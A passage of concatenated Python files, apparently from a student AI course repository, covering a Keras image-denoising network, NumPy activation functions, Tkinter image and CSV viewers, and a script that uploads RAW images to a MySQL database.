indices = np.roll(self.indices, item)
for b in range(self.batch):
image = self.images[indices[b]]
sources[b] = reduce(lambda i, t: t(i), [image / 255.] + self.source_transforms)
targets[b] = reduce(lambda i, t: t(i), [image / 255.] + self.target_transforms)
return sources, targets
class DenoisingNetwork(object):
def __new__(cls, mode: str) \
-> KM.Model:
assert mode in ['base', 'skip', 'bn']
inputs = KL.Input(shape=[None, None, 3],
name="input_image")
x = inputs
x = KL.Conv2D(64, (3, 3), padding="SAME",
kernel_initializer='random_uniform',
bias_initializer='zeros',
name="layer1")(x)
if mode == 'bn':
x = KL.BatchNormalization()(x)
x = KL.ReLU()(x)
x = KL.Conv2D(64, (3, 3), padding="SAME",
kernel_initializer='random_uniform',
bias_initializer='zeros',
name="layer2")(x)
if mode == 'bn':
x = KL.BatchNormalization()(x)
x = KL.ReLU()(x)
x = KL.Conv2D(64, (3, 3), padding="SAME",
kernel_initializer='random_uniform',
bias_initializer='zeros',
name="layer3")(x)
if mode == 'bn':
x = KL.BatchNormalization()(x)
x = KL.ReLU()(x)
x = KL.Conv2D(64, (3, 3), padding="SAME",
kernel_initializer='random_uniform',
bias_initializer='zeros',
name="layer4")(x)
if mode == 'bn':
x = KL.BatchNormalization()(x)
x = KL.ReLU()(x)
x = KL.Conv2D(3, (3, 3), padding="SAME",
kernel_initializer='random_uniform',
bias_initializer='zeros',
name="layer5")(x)
if mode == 'bn':
x = KL.BatchNormalization()(x)
x = KL.ReLU()(x)
if mode == 'skip' or mode == 'bn':
x = KL.average([x, inputs])
return KM.Model(inputs=inputs, outputs=x,
name='denoising')
@staticmethod
def loss(y_true: tf.Tensor, y_pred: tf.Tensor) \
-> tf.Tensor:
return K.mean(K.square(y_pred - y_true))
@classmethod
def metric(cls, y_true: tf.Tensor, y_pred: tf.Tensor) \
-> tf.Tensor:
return tf.image.psnr(y_true, y_pred, max_val=1.)
@classmethod
def compile(cls, model, optimizer, loss, metric)\
-> None:
model.compile(optimizer=optimizer,
loss=loss,
metrics=[metric])
class DenoisingModel(object):
def __init__(self, mode: str):
self.klass = DenoisingNetwork
self.model = self.klass(mode)
def train(self,
train_generator: Sequence,
val_generator: Sequence,
config: object, epochs: int) \
-> None:
optimizer = optim.Adam(lr=config.lr,
decay=config.lr_decay)
self.klass.compile(self.model,
optimizer=optimizer,
loss=self.klass.loss,
metric=self.klass.metric)
self.model.fit_generator(
train_generator,
epochs=epochs,
steps_per_epoch=len(train_generator),
validation_data=val_generator,
validation_steps=100,
workers=4,
use_multiprocessing=True,
callbacks=[
# TensorBoard(log_dir=config.log, write_graph=True, write_images=True),
# CustomCallback(log_dir=config.log, interval=config.interval,
# train=train_generator[0], test=[v for v in val_generator]),
]
)
def predict(self, inputs):
result, *_ = self.model.predict(inputs)
return result
def save(self, path: str):
self.model.save(path)
def main(args: argparse.Namespace):
train_generator = Dataset(
batch=args.batch,
target_transforms=[
], source_transforms=[
GaussianNoise(),
]
)
val_generator = Dataset(
train=False,
batch=1,
target_transforms=[
], source_transforms=[
GaussianNoise(),
]
)
model = DenoisingModel(mode=args.mode)
model.train(train_generator=train_generator,
val_generator=val_generator,
epochs=args.epoch, config=args)
model.save('model.hdf5')
if args.test:
eval_dataset = Eval(args.test)
result = model.predict(eval_dataset.image)
eval_dataset.set_result(result * 255.).to_png(args.test)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Evaluate Image Denoising')
parser.add_argument("--mode", default='base', choices=['base', 'skip', 'bn'],
help="Select mode for training model")
parser.add_argument("--epoch", type=int, default=100, required=False,
help="Epoch for training")
parser.add_argument("--interval", type=int, default=1, required=False)
parser.add_argument("--batch", type=int, default=32, required=False,
help="Mini-batch for training")
parser.add_argument("--lr", type=float, default=.001, required=False)
parser.add_argument("--lr-decay", type=float, default=.0, required=False)
parser.add_argument("--test", type=str, default='noisy.png', required=False,
help="Test filename")
parser.add_argument("--log", type=str, default='./logs', required=False,
help="Logging directory")
parser.add_argument("--seed", type=int, default=42, required=False,
help="The answer to life the universe and everything")
arguments = parser.parse_args()
init(arguments.seed)
main(arguments)
```
#### File: ImageDenoising/utils/data.py
```python
from typing import Tuple, List
from pathlib import Path
from itertools import chain
from functools import reduce
import cv2
import numpy as np
import tensorflow.keras as keras
from utils.transform import Transform
class Eval:
def __init__(self, filename: str):
self.image = np.expand_dims(cv2.imread(filename) / 255., axis=0)
def set_result(self, image: np.ndarray):
self.image = image
return self
def to_png(self, filename: str):
*path, ext = filename.split('.')
        filename = '.'.join(path) + '-result.' + ext
cv2.imwrite(filename, self.image)
class Dataset(keras.utils.Sequence):
def __init__(self, train: bool = True,
source_transforms: List[Transform] = None,
target_transforms: List[Transform] = None,
batch: int = 32, shuffle: bool = True):
self.batch = batch
self.shuffle = shuffle
self.channels = 3
self.is_training = True
(self.x_train, _), (self.x_test, _) = keras.datasets.cifar10.load_data()
self.images = self.x_train
self.size = self.x_train[0].shape[:2]
self.source_transforms = source_transforms or []
self.target_transforms = target_transforms or []
self.indices = np.arange(len(self.x_train))
def train(self, flag: bool = True):
self.is_training = flag
def eval(self):
self.train(False)
def on_epoch_end(self) \
-> None:
if self.shuffle:
np.random.shuffle(self.indices)
def __len__(self) \
-> int:
return len(self.images)
def __getitem__(self, item: int) \
-> Tuple[np.ndarray, np.ndarray]:
sources = np.empty((self.batch, *self.size, self.channels), dtype=np.float32)
targets = np.empty((self.batch, *self.size, self.channels), dtype=np.float32)
indices = np.roll(self.indices, item)
for b in range(self.batch):
image = self.images[indices[b]]
sources[b] = reduce(lambda i, t: t(i), [image / 255.] + self.source_transforms)
targets[b] = reduce(lambda i, t: t(i), [image / 255.] + self.target_transforms)
return sources, targets
```
#### File: NumpyNeuralNetwork/nnn/activations.py
```python
import numpy as np
from nnn.core import _Module
class Activation(_Module):
pass
class Sigmoid(Activation):
name = 'sigmoid'
def forward(self, X: np.ndarray, grad: bool = True) -> np.ndarray:
super(Sigmoid, self).forward(X, grad)
return 1. / (1. + np.exp(-X))
def backward(self, grad: np.ndarray) -> np.ndarray:
last = super(Sigmoid, self).backward(grad)
result = self.forward(last, grad=False)
return grad * result * (1. - result)
class ReLU(Activation):
name = 'relu'
def forward(self, X: np.ndarray, grad: bool = True) -> np.ndarray:
super(ReLU, self).forward(X, grad)
return np.maximum(0, X)
def backward(self, grad: np.ndarray) -> np.ndarray:
last = super(ReLU, self).backward(grad)
grad = grad.copy()
grad[last <= 0] = 0
return grad
``` |
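The `_Module` base class from `nnn.core` is not shown here, but the gradient formula can still be checked in isolation. A quick numeric verification of the identity `sigmoid'(x) = sigmoid(x) * (1 - sigmoid(x))` that `Sigmoid.backward` relies on:

```python
# Numeric check of the sigmoid derivative identity via central differences.
import numpy as np

x = np.linspace(-4., 4., 9)
sig = 1. / (1. + np.exp(-x))
analytic = sig * (1. - sig)

eps = 1e-6
numeric = ((1. / (1. + np.exp(-(x + eps)))) -
           (1. / (1. + np.exp(-(x - eps))))) / (2. * eps)

print(np.allclose(analytic, numeric, atol=1e-6))   # True
```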
{
"source": "jiuney/Multicampus_AI",
"score": 3
} |
#### File: 3-ComputerVision/codes/Code05-03 GIF Viewer.py
```python
from tkinter import *
from tkinter import messagebox
from tkinter.simpledialog import * # 입력받기. askinteger
from tkinter.filedialog import * # file dialog
import os
## 전역변수 선언부 ##
# dirName = "c:/images/Pet_GIF/Pet_GIF(256x256)/"
fnameList = []
photoList = [None]*6
num = 0 # 현재 사진 순번
## 함수 선언부 ##
def updateView():
global num
global fnameList
photo = PhotoImage(file=fnameList[num])
pLabel.configure(image=photo) # 속성을 바꿔주는 기능
lblFname.configure(text=fnameList[num])
pLabel.photo = photo
def clickPrev():
global num
num -= 1
if num < 0:
num = len(fnameList) - 1
updateView()
def clickLeft(event):
txt = ''
if event.num == 1:
txt += '왼쪽 버튼:'
elif event.num == 2:
txt += '가운데 버튼'
else:
txt += '오른쪽 버튼:'
txt += str(event.x) + ',' + str(event.y)
messagebox.showinfo('요기제목', txt)
def clickNext():
global num
num += 1
if num >= len(fnameList):
num = 0
updateView()
def clickHome():
global num
num = 0
updateView()
def clickEnd():
global num
num = len(fnameList) - 1
updateView()
def keyPress(event):
global num
curKey = event.keycode
curKey = curKey - ord('0')
if num + curKey >= len(fnameList):
num = len(fnameList) - 1
else:
num += curKey
updateView()
def jump(x):
global num
num = (num + x) % len(fnameList)
updateView()
def fileClick():
messagebox.showinfo('요기제목', '요기내용')
def hopImage(count=0):
if count==0:
count = askinteger("건너뛸 수", "숫자-->")
for _ in range(count):
clickNext()
def selectFile():
global pLabel
filename = askopenfilename(parent=window, filetypes=(("GIF파일", "*.gif"),("모든파일", "*.*")))
pLabel.configure(text=str(filename))
pLabel.text=filename
## 메인 코드부 ##
window = Tk()
window.title("GIF 사진 뷰어 (Ver 0.01)")
window.geometry("600x400")
window.resizable(width=FALSE, height=TRUE)
folder = askdirectory(parent=window)
for dirName, subDirList, fnames in os.walk(folder):
for fname in fnames:
if os.path.splitext(fname)[1].lower() == '.gif':
fnameList.append(os.path.join(dirName, fname))
mainMenu = Menu(window)
window.config(menu=mainMenu)
fileMenu = Menu(mainMenu)
menuMove = Menu(mainMenu)
menuJump = Menu(mainMenu)
# add cascade - 열리는거
# add command가 있음 - 뭔가 실행되는거
mainMenu.add_cascade(label='이동', menu=menuMove)
menuMove.add_command(label='앞으로', command=clickNext)
menuMove.add_command(label='뒤로', command=clickPrev)
mainMenu.add_cascade(label='건너뛰기', menu=menuJump)
menuJump.add_command(label='1', command=lambda:jump(1))
menuJump.add_command(label='3', command=lambda:jump(3))
menuJump.add_command(label='5', command=lambda:jump(5))
menuJump.add_command(label='원하는거', command=hopImage)
menuJump.add_command(label='파일열기', command=selectFile)
photo = PhotoImage(file= fnameList[num])
pLabel = Label(window, image=photo)
btnHome = Button(window, text='홈', command=clickHome)
btnPrev = Button(window, text='<< 이전 그림', command=clickPrev)
lblFname = Label(window, text=fnameList[num])
btnNext = Button(window, text='다음 그림>>', command=clickNext)
btnEnd = Button(window, text='마지막', command=clickEnd)
btnHome.place(x=50, y=10)
btnPrev.place(x=150, y=10)
lblFname.place(x=250, y=10)
btnNext.place(x=350, y=10)
btnEnd.place(x=450, y=10)
pLabel.place(x=15, y=50)
# label1 = Label(window, image=photo)
# label1.bind("<Button-1>", clickLeft)
window.bind("<Key>", keyPress)
# label1.pack(expand=1, anchor=CENTER)
window.mainloop()
```
#### File: 3-ComputerVision/codes/Code10-03.py
```python
from tkinter import *
from tkinter import ttk
import csv
from tkinter.filedialog import *
def openCSV() :
global csvList
filename = askopenfilename(parent=None,
filetypes=(("CSV 파일", "*.csv"), ("모든 파일", "*.*")))
csvList = []
with open(filename)as rfp:
reader = csv.reader(rfp)
headerList = next(reader)
sum = 0
count = 0
for cList in reader:
csvList.append(cList)
# 기존 시트 클리어
sheet.delete(*sheet.get_children())
# 첫번째 열 헤더 만들기
sheet.column('#0', width=70) # 첫 컬럼의 내부이름
sheet.heading('#0', text=headerList[0])
# 두번째 이후 열 헤더 만들기
sheet['columns'] = headerList[1:] # 두분째 이후 컬럼의 내부이름(내맘대로)
for colName in headerList[1:] :
sheet.column(colName, width=70)
sheet.heading(colName, text=colName)
# 내용 채우기.
for row in csvList :
sheet.insert('', 'end', text=row[0], values=row[1:])
sheet.pack(expand=1, anchor=CENTER)
import xlrd
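# Note: xlrd 2.x only reads legacy .xls workbooks; for .xlsx files either pin xlrd<2.0
# or switch to openpyxl, otherwise open_workbook() below will fail.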
def openExcel() :
global csvList
filename = askopenfilename(parent=None,
filetypes=(("엑셀 파일", "*.xls;*.xlsx"), ("모든 파일", "*.*")))
csvList = []
workbook = xlrd.open_workbook(filename)
print(workbook.nsheets)
wsList = workbook.sheets()
headerList = []
for i in range(wsList[0].ncols) :
headerList.append(wsList[0].cell_value(0,i))
print(headerList)
# 내용 채우기
for wsheet in wsList :
rowCount = wsheet.nrows
colCount = wsheet.ncols
for i in range(1, rowCount) :
tmpList = []
for k in range(0, colCount) :
tmpList.append(wsheet.cell_value(i,k))
csvList.append(tmpList)
# 기존 시트 클리어
sheet.delete(*sheet.get_children())
# 첫번째 열 헤더 만들기
sheet.column('#0', width=70) # 첫 컬럼의 내부이름
sheet.heading('#0', text=headerList[0])
# 두번째 이후 열 헤더 만들기
sheet['columns'] = headerList[1:] # 두분째 이후 컬럼의 내부이름(내맘대로)
for colName in headerList[1:] :
sheet.column(colName, width=70)
sheet.heading(colName, text=colName)
# 내용 채우기.
for row in csvList :
sheet.insert('', 'end', text=row[0], values=row[1:])
sheet.pack(expand=1, anchor=CENTER)
window = Tk()
window.geometry('600x500')
sheet = ttk.Treeview(window)
mainMenu = Menu(window)
window.config(menu=mainMenu)
fileMenu = Menu(mainMenu)
mainMenu.add_cascade(label="CSV 처리", menu=fileMenu)
fileMenu.add_command(label="CSV 열기", command=openCSV)
fileMenu.add_command(label="엑셀 열기", command=openExcel)
fileMenu.add_separator()
window.mainloop()
```
#### File: 3-ComputerVision/codes/mission05-02.py
```python
from tkinter import *
from tkinter.filedialog import *
from tkinter.simpledialog import * # for askinteger
## 함수 선언 부분 ##
def func_open():
global photo
filename = askopenfilename(parent = window, filetypes = (("GIF 파일", "*.gif"),
("모든 파일", "*.*")))
photo = PhotoImage(file = filename)
pLabel.configure(image = photo)
pLabel.image = photo
def func_exit():
window.quit()
window.destroy()
def func_zoom_in():
global photo, pLabel
mag = int(askinteger("확대배수", "확대할 배수를 입력하세요(2~8)"))
photo = photo.zoom(mag, mag)
pLabel.configure(image=photo)
pLabel.image = photo
def func_zoom_out():
global photo, pLabel
mag = int(askinteger("축소배수", "축소할 배수를 입력하세요(2~8)"))
photo = photo.subsample(mag, mag)
pLabel.configure(image=photo)
pLabel.image = photo
## 메인 코드 부분 ##
window = Tk()
window.geometry("400x400")
window.title("명화 감상하기")
photo = PhotoImage()
pLabel = Label(window, image = photo)
pLabel.pack(expand = 1, anchor = CENTER)
mainMenu = Menu(window)
window.config(menu = mainMenu)
fileMenu = Menu(mainMenu)
mainMenu.add_cascade(label = '파일', menu=fileMenu)
fileMenu.add_command(label = '파일 열기', command = func_open)
fileMenu.add_separator()
fileMenu.add_command(label = '프로그램 종료', command = func_exit)
expandMenu = Menu(mainMenu)
mainMenu.add_cascade(label = '이미지 효과', menu=expandMenu)
expandMenu.add_command(label = '확대하기', command = func_zoom_in)
expandMenu.add_command(label = '축소하기', command = func_zoom_out)
window.mainloop()
```
#### File: 3-ComputerVision/codes/mission08-02.py
```python
from tkinter import *
from tkinter.simpledialog import *
from tkinter.filedialog import *
import math
import os
import os.path
#####################
#### 전역 변수부 ####
#####################
IP_ADDR = '192.168.56.107'
USER_NAME = 'root'
USER_PASS = '<PASSWORD>'
DB_NAME = 'BigData_DB'
CHAR_SET = 'utf8'
################
#### 함수부 ####
################
def getPathList(folderFullName: str) -> list:
"""
특정 폴더의 전체 파일을 리스트 형태로 반환합니다.
:param folderFullName:파일명을 가져올 대상 경로. 절대경로
:return: 대상 경로 안에 들어있는 모든 경로들을 절대 경로로 반환(list)
"""
fullNameList = []
for dirName, subDirList, fnames in os.walk(folderFullName):
for fname in fnames:
fullName = os.path.join(dirName, fname)
fullNameList.append(fullName)
return fullNameList
import pymysql
import datetime
def uploadRawImage() -> None:
"""
특정 폴더를 지정해서 일괄적으로 RAW파일을 원격 DB에 저장합니다.
:return:없음
"""
filename = askdirectory(parent=window)
fullNameList = getPathList(filename)
rawFileList = [i for i in fullNameList if os.path.splitext(i)[1].lower() == '.raw']
for rawFile in rawFileList:
con = pymysql.connect(host=IP_ADDR, user=USER_NAME, password=<PASSWORD>,
db=DB_NAME, charset=CHAR_SET)
cur = con.cursor()
fullname = rawFile
with open(fullname, 'rb') as rfp:
binData = rfp.read()
fname = os.path.basename(fullname)
fsize = os.path.getsize(fullname)
height = width = int(math.sqrt(fsize))
now = datetime.datetime.now()
upDate = now.strftime('%Y-%m-%d')
upUser = USER_NAME
sql = "INSERT INTO rawImage_TBL(raw_id , raw_height , raw_width"
sql += ", raw_fname , raw_update , raw_uploader, raw_avg , raw_data) "
sql += " VALUES(NULL," + str(height) + "," + str(width) + ",'"
sql += fname + "','" + upDate + "','" + upUser + "',0 , "
sql += " %s )"
tupleData = (binData,)
cur.execute(sql, tupleData)
con.commit()
cur.close()
con.close()
def malloc(h, w, initValue=0) :
retMemory= []
for _ in range(h) :
tmpList = []
for _ in range(w) :
tmpList.append(initValue)
retMemory.append(tmpList)
return retMemory
def getImageDetails(fname) -> tuple:
fsize = os.path.getsize(fname) # 파일의 크기(바이트)
inH = inW = int(math.sqrt(fsize)) # 핵심 코드
## 입력영상 메모리 확보 ##
inImage = []
inImage = malloc(inH, inW)
# 파일 --> 메모리
with open(fname, 'rb') as rFp:
for i in range(inH):
for k in range(inW):
inImage[i][k] = int(ord(rFp.read(1)))
flatData = [inImage[i][k] for i in range(inH) for k in range(inW)]
avgImage = sum(flatData)//(inH*inW)
maxImage = max(flatData)
minImage = min(flatData)
return avgImage, maxImage, minImage
def uploadDetailRawImage():
"""
:param fullNameList:raw파일이 들어있는 경로의 모든 파일
:return:없음
"""
filename = folder = askdirectory(parent=window)
fullNameList = getPathList(filename)
rawFileList = [i for i in fullNameList if os.path.splitext(i)[1].lower() == '.raw']
for rawFile in rawFileList:
con = pymysql.connect(host=IP_ADDR, user=USER_NAME, password=<PASSWORD>,
db=DB_NAME, charset=CHAR_SET)
cur = con.cursor()
fullname = rawFile
with open(fullname, 'rb') as rfp:
binData = rfp.read()
fname = os.path.basename(fullname)
fsize = os.path.getsize(fullname)
height = width = int(math.sqrt(fsize))
avgVal, maxVal, minVal = getImageDetails(rawFile)
now = datetime.datetime.now()
upDate = now.strftime('%Y-%m-%d')
upUser = USER_NAME
sql = "INSERT INTO rawImage_TBL2(raw_id , raw_height , raw_width"
sql += ", raw_fname , raw_update , raw_uploader, raw_avg, raw_min, raw_max , raw_data) "
sql += " VALUES(NULL," + str(height) + "," + str(width) + ",'"
sql += fname + "','" + upDate + "','" + upUser + "'," + str(avgVal) + " , "
sql += str(minVal) + ", " + str(maxVal) + ", "
sql += " %s )"
tupleData = (binData,)
cur.execute(sql, tupleData)
con.commit()
cur.close()
con.close()
#####################
#### 메인 코드부 ####
#####################
if __name__ == "__main__":
window = Tk() # 윈도우 생성
window.geometry("500x500") # 가로 500px, 세로 500px
window.title("컴퓨터 비전(딥러닝 기법) ver 0.03")
mainMenu = Menu(window)
window.config(menu=mainMenu)
fileMenu = Menu(mainMenu)
mainMenu.add_cascade(label="파일", menu=fileMenu)
fileMenu.add_command(label="RAW 이미지 일괄 저장(DB)", command=uploadRawImage)
fileMenu.add_command(label="RAW 이미지 일괄 저장(DB) + (평균, 최대값, 최소값)", command=uploadDetailRawImage)
window.mainloop()
```
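For completeness, a hedged sketch of pulling one of the stored RAW blobs back out of `rawImage_TBL` and writing it to disk. The connection values mirror the constants defined in the script above, the password stays a placeholder, and `raw_id = 1` is an arbitrary example.

```python
# Read a stored RAW image back from MySQL (raw_id 1 is an arbitrary example).
import pymysql

con = pymysql.connect(host='192.168.56.107', user='root', password='***',
                      db='BigData_DB', charset='utf8')
cur = con.cursor()
cur.execute("SELECT raw_fname, raw_data FROM rawImage_TBL WHERE raw_id = %s", (1,))
fname, binData = cur.fetchone()
with open(fname, 'wb') as wfp:
    wfp.write(binData)
cur.close()
con.close()
```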
#### File: 3-ComputerVision/codes/myVision_without_np.py
```python
import tkinter
from tkinter.simpledialog import *
from tkinter.filedialog import *
import math
import os
import os.path
import numpy as np
import struct
import matplotlib.pyplot as plt
import threading
import time
from PIL import Image, ImageFilter, ImageEnhance, ImageOps
import colorsys
import random
import tempfile
import pymysql
import csv
#######################
#### 클래스 선언부 ####
#######################
class Window(tkinter.Tk): # tkinter Tk를 상속
def __init__(self, H=500, W=500):
super(Window, self).__init__()
self.canvas = None
self.inImage = None
self.outImage = None
self.photo = None
self.H = H
self.W = W
self.panYN = N
self.viewX = W
self.viewY = H
self.sx = 0
self.sy = 0
self.ex = W-1
self.ey = H-1
def putSize(self, H: int, W: int):
self.H = H
self.W = W
def getSize(self):
return self.H, self.W
class Canvas(tkinter.Canvas): # tkinter Canvas를 상속
def __init__(self, window, height=500, width=500):
super(Canvas, self).__init__(window, height=height, width=width)
self.paper = None
self.H, self.W = window.getSize()
def putSize(self, H: int, W: int):
self.H = H
self.W = W
def getSize(self):
return self.H, self.W
class Paper:
def __init__(self, window: Canvas):
self.paper = None
self.H, self.W = window.getSize()
def putSize(self, H: int, W: int):
self.H = H
self.W = W
def getSize(self):
return self.H, self.W
class __Image:
def __init__(self, H=-1, W=-1):
self.H = H
self.W = W
self.filename = ''
self.mem = None
def putSize(self, H: int, W: int):
self.H = H
self.W = W
def getSize(self):
return self.H, self.W
def malloc(self, initValue: int = 0) -> list:
"""
이미지의 높이, 폭 값을 받아온 다음 메모리를 할당하여 list로 돌려준다.
:param initValue:
:return:
"""
if self.H == -1 or self.W == -1:
print("set H and W!! @ %s" % __class__)
exit(-1)
retMemory = []
for RGB in range(3):
retMemory.append([])
for i in range(self.H):
retMemory[RGB].append([])
for k in range(self.W):
retMemory[RGB][i].append(initValue)
self.mem = retMemory
class InImage(__Image):
def __init__(self, H=-1, W=-1):
super(InImage, self).__init__(H=H, W=W)
class OutImage(__Image):
def __init__(self, H=-1, W=-1):
super(OutImage, self).__init__(H=H, W=W)
#########################
#### 전역변수 선언부 ####
#########################
# image information
# mywin = MyWindow(H=500, W=500)
#
# mycan = MyCanvas(parent=mywin)
# mywin.canvas = mycan
#
# mypap = MyPaper(parent=mycan)
# mycan.paper = mypap
#
# inImage = InImage()
# outImage = OutImage()
# DB information
IP_ADDR = '192.168.56.106'
USER_NAME = 'root'
USER_PASS = '<PASSWORD>'
DB_NAME = 'BigData_DB'
CHAR_SET = 'utf8'
# tkinter wrapping variables
BOTTOM = tkinter.BOTTOM
X = tkinter.X
SUNKEN = tkinter.SUNKEN
W = tkinter.W
# tkinter wrapping Classes
Label = tkinter.Label
Menu = tkinter.Menu
# color information
R = 0
G = 1
B = 2
#####################
#### 함수 선언부 ####
#####################
def loadImage(window, fname: str) -> None:
photo = Image.open(fname) # PIL 객체
image = InImage()
## 메모리 확보
inW = photo.width
inH = photo.height
image.putSize(H=inH, W=inW)
image.malloc()
photoRGB = photo.convert('RGB')
for i in range(inH):
for k in range(inW):
r, g, b = photoRGB.getpixel((k, i))
image.mem[R][i][k] = r
image.mem[G][i][k] = g
image.mem[B][i][k] = b
window.photo = photo
return image
# 파일을 선택해서 메모리로 로딩하는 함수
def openImageColor(window):
filename = askopenfilename(parent=window,
filetypes=(("칼라 파일", "*.jpg;*.png;*.bmp;*.tif"), ("모든 파일", "*.*")))
if not filename:
return
window.inImage = loadImage(window, filename)
equalImage(window)
def saveImageColor(window):
outImage = window.outImage
if not outImage:
return
outArray= []
for i in range(outImage.H):
tmpList = []
for k in range(outImage.W):
tup = tuple([outImage.mem[R][i][k], outImage.mem[G][i][k], outImage.mem[B][i][k],])
tmpList.append(tup)
outArray.append(tmpList)
outArray = np.array(outArray)
savePhoto = Image.fromarray(outArray.astype(np.uint8), 'RGB')
saveFp = asksaveasfile(parent=window, mode='wb',
defaultextension='.', filetypes=(("그림 파일", "*.png;*.jpg;*.bmp;*.tif"), ("모든 파일", "*.*")))
if not saveFp:
return
savePhoto.save(saveFp.name)
print('Save~')
def displayImageColor(window):
canvas = window.canvas
outImage = window.outImage
if canvas: # 예전에 실행한 적이 있다.
canvas.destroy()
window.viewY, window.viewX = outImage.getSize() # H, W값 순서
step = 1
window.geometry(str(int(window.viewX * 1.2)) + 'x' + str(int(window.viewY * 1.2))) # 벽
canvas = Canvas(window, height=window.viewY, width=window.viewX)
window.canvas = canvas
paper = PhotoImage(height=window.viewY, width=window.viewX)
canvas.paper = paper
canvas.create_image(
(window.viewX // 2, window.viewY // 2), image=paper, state='normal')
## 성능 개선
rgbStr = '' # 전체 픽셀의 문자열을 저장
for i in np.arange(0, outImage.H, step):
tmpStr = ''
for k in np.arange(0, outImage.W, step):
i = int(i)
k = int(k)
r, g, b = outImage.mem[R][i][k], outImage.mem[G][i][k], outImage.mem[B][i][k]
tmpStr += ' #%02x%02x%02x' % (r, g, b)
rgbStr += '{' + tmpStr + '} '
paper.put(rgbStr)
# canvas.bind('<Button-1>', mouseClick)
# canvas.bind('<ButtonRelease-1>', mouseDrop)
canvas.pack(expand=1, anchor=CENTER)
# status.configure(text='이미지 정보:' + str(outW) + 'x' + str(outH))
# ###############################################
# ##### 컴퓨터 비전(영상처리) 알고리즘 함수 모음 #####
# ###############################################
# # 동일영상 알고리즘
def equalImage(window):
inImage = window.inImage
outImage = window.outImage
###### 메모리 할당 ################
outH, outW = inImage.getSize()
outImage = OutImage(H=outH, W=outW)
outImage.malloc()
####### 진짜 컴퓨터 비전 알고리즘 #####
for RGB in range(3):
for i in range(inImage.H):
for k in range(inImage.W):
outImage.mem[RGB][i][k] = inImage.mem[RGB][i][k]
window.outImage = outImage
displayImageColor(window)
def addImageColor(window):
## 중요! 코드. 출력영상 크기 결정 ##
inImage = window.inImage
outH = inImage.H
outW = inImage.W
## 메모리 확보
outImage = OutImage(H=outH, W=outW)
outImage.malloc()
############################
### 진짜 컴퓨터 비전 알고리즘 ###
value = askinteger("밝게/어둡게", "값-->", minvalue=-255, maxvalue=255)
for RGB in range(3) :
for i in range(inImage.H) :
for k in range(inImage.W) :
if inImage.mem[RGB][i][k] + value > 255 :
outImage.mem[RGB][i][k] = 255
elif inImage.mem[RGB][i][k] + value < 0 :
outImage.mem[RGB][i][k] = 0
else :
outImage.mem[RGB][i][k] = inImage.mem[RGB][i][k] + value
#############################
window.outImage = outImage
displayImageColor(window)
def revImageColor(window):
## 중요! 코드. 출력영상 크기 결정 ##
inImage = window.inImage
outH = inImage.H
outW = inImage.W
## 메모리 확보
outImage = OutImage(H=outH, W=outW)
outImage.malloc()
############################
### 진짜 컴퓨터 비전 알고리즘 ###
for RGB in range(3):
for i in range(inImage.H):
for k in range(inImage.W):
outImage.mem[RGB][i][k] = 255 - inImage.mem[RGB][i][k]
#############################
window.outImage = outImage
displayImageColor(window)
def paraImageColor(window):
## 중요! 코드. 출력영상 크기 결정 ##
inImage = window.inImage
outH = inImage.H
outW = inImage.W
## 메모리 확보
outImage = OutImage(H=outH, W=outW)
outImage.malloc()
############################
### 진짜 컴퓨터 비전 알고리즘 ###\
LUT = [0 for _ in range(256)]
for input in range(256):
LUT[input] = int(255 - 255 * math.pow(input / 128 - 1, 2))
for RGB in range(3):
for i in range(inImage.H):
for k in range(inImage.W):
outImage.mem[RGB][i][k] = LUT[inImage.mem[RGB][i][k]]
#############################
window.outImage = outImage
displayImageColor(window)
def morphImageColor(window):
## 중요! 코드. 출력영상 크기 결정 ##
inImage = window.inImage
outH = inImage.H
outW = inImage.W
## 추가 영상 선택
filename2 = askopenfilename(parent=window,
filetypes=(("칼라 파일", "*.jpg;*.png;*.bmp;*.tif"), ("모든 파일", "*.*")))
if not filename2:
return
inImage2 = loadImage(window, filename2)
## 메모리 확보
outImage = OutImage(H=outH, W=outW)
outImage.malloc()
# 작은 쪽에 맞춤
if inImage.H > inImage2.H:
inImage.H = inImage2.H
if inImage.W > inImage2.W:
inImage.W = inImage2.W
import threading
import time
def morpFunc():
w1 = 1
w2 = 0
for _ in range(20):
for RGB in range(3) :
for i in range(inImage.H):
for k in range(inImage.W):
newValue = int(inImage.mem[RGB][i][k] * w1 + inImage2.mem[RGB][i][k] * w2)
if newValue > 255:
newValue = 255
elif newValue < 0:
newValue = 0
outImage.mem[RGB][i][k] = newValue
window.outImage = outImage
displayImageColor(window)
w1 -= 0.05;
w2 += 0.05
time.sleep(0.5)
threading.Thread(target=morpFunc).start()
def addSValuePillow(window):
photo = window.photo
inImage = window.inImage
## 중요! 코드. 출력영상 크기 결정 ##
value = askfloat("","0~1~10")
photo2 = photo.copy()
photo2 = ImageEnhance.Color(photo2)
photo2 = photo2.enhance(value)
## 중요! 코드. 출력영상 크기 결정 ##
outH = inImage.H
outW = inImage.W
###### 메모리 할당 ################
outImage = OutImage(H=outH, W=outW)
outImage.malloc()
## 임시 출력 --> 원 출력
for i in range(outH):
for k in range(outW):
r, g, b = photo2.getpixel((k, i))
outImage.mem[R][i][k] = r
outImage.mem[G][i][k] = g
outImage.mem[B][i][k] = b
displayImageColor(window)
def addSValueHSV(window):
## 입력 RGB --> 입력 HSV
# 메모리 확보
inImage = window.inImage
inH = inImage.H
inW = inImage.W
inImageHSV = InImage(H=inImage.H, W=inImage.W)
inImageHSV.malloc()
# RGB -> HSV
for i in range(inH):
for k in range(inW):
r, g, b = inImage.mem[R][i][k], inImage.mem[G][i][k], inImage.mem[B][i][k]
h, s, v = colorsys.rgb_to_hsv(r / 255, g / 255, b / 255)
inImageHSV.mem[0][i][k], inImageHSV.mem[1][i][k], inImageHSV.mem[2][i][k] = h, s, v
## 중요! 코드. 출력영상 크기 결정 ##
outH = inH
outW = inW
###### 메모리 할당 ################
outImage = OutImage(H=outH, W=outW)
outImage.malloc()
####### 진짜 컴퓨터 비전 알고리즘 #####
value = askfloat("", "-255~255") # -255 ~ 255
value /= 255
## HSV --> RGB
for i in range(outH):
for k in range(outW):
newS = inImageHSV.mem[1][i][k] + value
if newS < 0 :
newS = 0
elif newS > 1.0 :
newS = 1.0
h, s, v = inImageHSV.mem[0][i][k], newS, inImageHSV.mem[2][i][k]*255
r, g, b = colorsys.hsv_to_rgb(h, s, v)
outImage.mem[R][i][k], outImage.mem[G][i][k], outImage.mem[B][i][k] = int(r), int(g), int(b)
window.outImage = outImage
displayImageColor(window)
# 이진화 알고리즘
def bwImage(window):
## 중요! 코드. 출력영상 크기 결정 ##
inImage = window.inImage
